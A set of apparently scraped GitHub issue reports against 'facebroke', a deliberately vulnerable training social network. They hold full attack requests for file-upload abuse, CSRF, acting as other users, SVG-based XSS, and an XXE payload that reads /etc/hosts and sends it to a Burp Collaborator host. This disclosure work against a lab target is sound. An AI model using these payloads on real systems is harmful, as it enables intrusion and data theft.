softwaresecured / facebroke Goto Github PK
View Code? Open in Web Editor NEWA deliberately vulnerable social network
License: GNU General Public License v3.0
A deliberately vulnerable social network
License: GNU General Public License v3.0
Steps to reproduce:
I was able to upload docx, svg, xml, html, jsp etc
Attack Request:
POST /image HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------264311999222285
Content-Length: 827
Referer: https://192.168.99.100:8443/settings?id=1002
Cookie: JSESSIONID=D997F0ADEA6C0E4E5445D957349C22F0
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------264311999222285
Content-Disposition: form-data; name="creator_id"
1002
-----------------------------264311999222285
Content-Disposition: form-data; name="owner_id"
1002
-----------------------------264311999222285
Content-Disposition: form-data; name="label"
Profile Picture
-----------------------------264311999222285
Content-Disposition: form-data; name="context"
profile
-----------------------------264311999222285
Content-Disposition: form-data; name="file"; filename="evil-xxe.docx"
Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
<!ENTITY % data SYSTEM "file:///etc/hosts"><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'yy08gndcee5xrh6ws928gj4qlhr7fw.burpcollaborator.net?%data;'>">
-----------------------------264311999222285--
Attack response:
HTTP/1.1 302
Location: settings?id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 15:49:25 GMT
Connection: close
The application is vulnerable to CSRF attacks on all POST requests.
Steps to reproduce:
PoC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://192.168.99.100:8443/wall?user_id=1002" method="POST">
<input type="hidden" name="on_wall" value="1" />
<input type="hidden" name="creator_id" value="682" />
<input type="hidden" name="type" value="TEXT" />
<input type="hidden" name="content" value="CSRFed not myself" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Attack Request:
POST /wall?user_id=1002 HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Referer: http://burp/
Cookie: JSESSIONID=5FE72AC60AACB875AD93B6F63C87A69A
Connection: close
Upgrade-Insecure-Requests: 1
on_wall=1&creator_id=682&type=TEXT&content=CSRFed+not+myself
Attack Response:
HTTP/1.1 302
Location: wall?user_id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 17:14:34 GMT
Connection: close
All the POST requests look vulnerable to a similar attack as there are no CSRF tokens being used
Steps to Reproduce:
Note: creator_id=682 is the Adam Perez user and user_id=1002 is myself
Attack Request
POST /wall?user_id=1002 HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Referer: https://192.168.99.100:8443/index
Cookie: JSESSIONID=5FE72AC60AACB875AD93B6F63C87A69A
Connection: close
Upgrade-Insecure-Requests: 1
on_wall=1&creator_id=682&type=TEXT&content=not myself
Attack Response
HTTP/1.1 302
Location: wall?user_id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 17:10:57 GMT
Connection: close
Steps to reproduce:
Attack Request:
POST /settings?id=486 HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363
regLastName=Test®Password=®DOB=1995-09-01&[email protected]®Username=otest®FirstName=Olivia&target_id=486®PasswordConfirm=
Attack Response:
HTTP/1.1 302
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 14:01:09 GMT
Connection: close
Steps to reproduce:
Attack Request:
POST /image HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: multipart/form-data; boundary=--------207487880
Content-Length: 884
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363
----------207487880
Content-Disposition: form-data; name="file"; filename="image.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('This app is probably vulnerable to XSS attacks!');
</script>
</svg>
----------207487880
Content-Disposition: form-data; name="owner_id"
486
----------207487880
Content-Disposition: form-data; name="creator_id"
486
----------207487880
Content-Disposition: form-data; name="context"
profile
----------207487880
Content-Disposition: form-data; name="label"
Test Picture
----------207487880--
Attack Response:
HTTP/1.1 302
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 13:49:46 GMT
Connection: close
Steps to reproduce:
Here are the request and responses showing posting a comment as another user. For reference my user has an id of 1002
Attack Request
POST /comment HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Referer: https://192.168.99.100:8443/wall?user_id=1002
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363
Connection: close
Upgrade-Insecure-Requests: 1
on_wall=1&creator_id=486&post_id=2892&content=Sandra Comment
Attack Response
HTTP/1.1 302
Location: wall?user_id=1002#2892
Content-Length: 0
Date: Thu, 26 Oct 2017 13:45:32 GMT
Connection: close
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.